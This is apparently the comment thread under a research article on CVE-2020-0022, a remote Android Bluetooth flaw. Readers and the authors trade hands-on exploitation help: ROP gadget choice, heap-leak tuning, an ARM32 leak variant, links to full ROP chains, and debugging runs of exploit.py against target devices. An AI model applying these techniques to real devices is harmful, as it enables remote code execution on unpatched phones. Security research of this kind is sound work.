x19+e = call_saved_system_ptr
dlsym is imported by almost every library, therefore you will find a jump to that function in the relocation table. The address of this gadget can be computed from the base address of the library if you know the remote running version.
yeah,I undstand you methods,thats use function “u_clean_up” control the execute flow and X19 poniter simulate the stack,this very excellent ideas!but how I can set X19 point to my buffer?where it point when the story begins?:)
Short answer: you can use C++ object calls for that
Long answer: Added to the post above for better readability. Starting at:
“To set x19, lets first recap the preconditions”
God question!
Hello I am trying to do copy this on my oppo 5 but i am not sure if i have the right file – is it different for different devices? – note for security reasons i modified the MAC address below for this post
kali@kali:~/Downloads/cve_2020_0022_export$ sudo python2 exploit.py C4:FF:00:CA:00:48 libs/libicuuc.so
Not connected.
loading libs/libicuuc.so
Lost connection
Connecting
Traceback (most recent call last):
File “exploit.py”, line 266, in
libicuuc_symbols = load_symbols(sys.argv[2])
File “exploit.py”, line 234, in load_symbols
fd = open(fname, “rb”)
IOError: [Errno 2] No such file or directory: ‘libs/libicuuc.so’
Hi
The libicuuc.so needs to be copied from your target device. It is required is, because our PoC automatically searches for the offsets of the gadgets used for ROP, as well as the offset between the functions used to determine the library base address.
In theory, you might be able to fingerprint the remote library version using the leak and find gadgets, that is not device-dependent. Cross-device compatibility is something, we have not evaluated.
Seems like I can’t find i suitable gadget to save x0 after dlsym call when i’m already inside cleanup function, i mean the only gadget which can save x0 uses x8 and x8 get overwrited after the ret so it’s pretty useless
We hadd the same problem, but as you are almost done just a hint: close enough is sometimes sufficient.
Good luck ! 😉
hi,Jan!
I test simple_crash.py、simple_leak.py、fancy_leak.py on 4 phone(nexus6p,glaxy s8..),all can’t sucess crash or leak infomations,I check the code:
“if ord(pkt[0]) == 0x04 and ord(pkt[1]) == 0x03:
if handle == 0:
handle = struct.unpack(“<H", pkt[4:6])[0]
print "Got connection handle", handle" ,
looks can't get the handle,thats not received the 0403 packets,and I use https://github.com/leommxj/cve-2020-0022 ,this poc can crash all 4 phone,its get handle by call getsockopt on l2cap socket,I don't know that two "handle" have some the difference?and there have other ways to get the handle in python environment?
Hi,
Thanks for the link. The code looks much cleaner, than ours 😀
Using getsockopt sounds like the proper way of determining the connection handle and if it works for you the call seems to be correct. This is a Linux system call [1] and there exists a wrapper in python[2].
In the code, you have mentioned I manually parse the HCI response the connection handle. This was a quick and dirty method. It also requires HCI Raw sockets, which seems to be not the most reliable way on some systems. If you want to verify the correctness of the handle you could have a look at the HCI traffic in Wireshark and compare it.
[1] https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
[2] https://kite.com/python/docs/socket.socket.getsockopt
Hi,Jan
I trying the fancy_leak(nexus6p,8.0.1),its can leak the remote handle and heap spray sucess,but can’t leak the address of libicuuc.so ,and I mentioned the code :
verify_len = 48
…
send_echo_hci(ident+1, “A”*46, l2cap_len_adj=2)
then I test simple_leak with the “A*46” get the same result.
My question is there have some relationship between 48 and 46?
where and how can I adjust to workfine?
Hi,
and here again, sorry for the late response but this is also not a trivial question. First of all, what we try to do here is to place our input in front of the source buffer. This is used, so we can control the underflow, which is used to overwrite the packet headers to increase the leak. To detect, if we have placed our data correctly, we compare ‘verify_len’ bytes of the leaked data with the expected data. So this length is somewhat arbitrary.
The other length (48) you mentioned is the length of the packet, that will be corrupted, including the packet headers. This length has to be short enough, to reach the HCI, ACL and L2CAP header, but must not modify the BT_HDR. The 48 bytes was tuned, so the underflow ends at the BT_HDR. The length stored in the BT_HDR has to be correct to exit the reassembly logic and pass the packet to L2CAP. If we would also increase this length, the reassembly logic will continue to receive packets, until the corrupted length stored in the BT_HDR is reached. (In hindsight, this might be also usable, to extend the overflow to control even more data on the heap.)
Hopefully, I have not missed a constraint.
If you have trouble, you could go through the same process of analyzing the memory in the different stages of the exploit. Use patterns, that are easily recognizable in memory and see, how the target is behaving.
A great article. Thanks for sharing.
A great article. Thanks for sharing.
Hello
The lock-down let me the time to play with this vulnerability on my Bbox android tv stb thanks to your really great article
I manage to call system 🙂
I had to find another leak method because the box is built on a Cortex A9 which is an ARM32 and memcpy function don’t corrupt -64 bytes as on ARM64
But the vulnerability is present and is exploitable in a different way
By sending l2cap packet with 4 bytes fragmentation we can trigger a memcpy of 0 length in reassemble_and_dispatch
This allow to get 4 bytes of uninitialized data at end of the echo
Increasing first packet length allow to “walk” the uninitialized memory
Getting 32 echos with same first packet length give 2 to 8 exploitable memory leaks
Echos are repeated so no need to get more then 32 echos with same first packet length
This method we also fill the memory with the sent packets so it’s easy to recognize patterns and find offsets in leaks
You can check my github repository with full ROP chain 😉 here:
https://github.com/Polo35/CVE-2020-0022
Thank you very much for sharing all of this
Best regards
Thank you . Read article
Thanks For sharing nice article.
A nice article. Thanks for sharing.
A great article. Thanks for sharing!
Hi,Jan
I’m trying exploit.py with nokia 2.2(Android 9). I can see the message “Heap spray successfull”, but bluetooth crashed
I checked logcat and it says
03-21 08:25:32.910 19515 19554 I app_process64: system/bt/main/bte_main.cc:113:3: runtime error: control flow integrity check for type ‘base::TaskRunner’ failed during non-virtual call (vtable address 0x5959595959595959)
03-21 08:25:32.910 19515 19554 I app_process64:
03-21 08:25:33.010 19515 19554 I app_process64: 0x5959595959595959: note: invalid vtable
03-21 08:25:33.010 19515 19554 I app_process64:
03-21 08:25:33.010 19515 19554 I app_process64:
03-21 08:25:33.010 19515 19554 I app_process64:
03-21 08:25:33.011 19515 19554 F libc : Fatal signal 6 (SIGABRT), code -6 (SI_TKILL) in tid 19554 (HwBinder:19515_), pid 19515 (droid.bluetooth)
03-21 08:25:33.144 19639 19639 I crash_dump64: performing dump of process 19515 (target tid = 19554)
03-21 08:25:33.172 19639 19639 F DEBUG : pid: 19515, tid: 19554, name: HwBinder:19515_ >>> com.android.bluetooth <<<
03-21 08:25:33.798 868 19644 D AES : ExceptionLog: notify aed, process:com.android.bluetooth pid:19515 cause:system_app_native_crash
03-21 08:25:33.845 868 3504 I ActivityManager: Process com.android.bluetooth (pid 19515) has died: psvc PER
03-21 08:25:33.846 868 954 W libprocessgroup: kill(-19515, 9) failed: No such process
03-21 08:25:33.847 868 954 I libprocessgroup: Successfully killed process cgroup uid 1002 pid 19515 in 0ms
Any advice?
Thank you!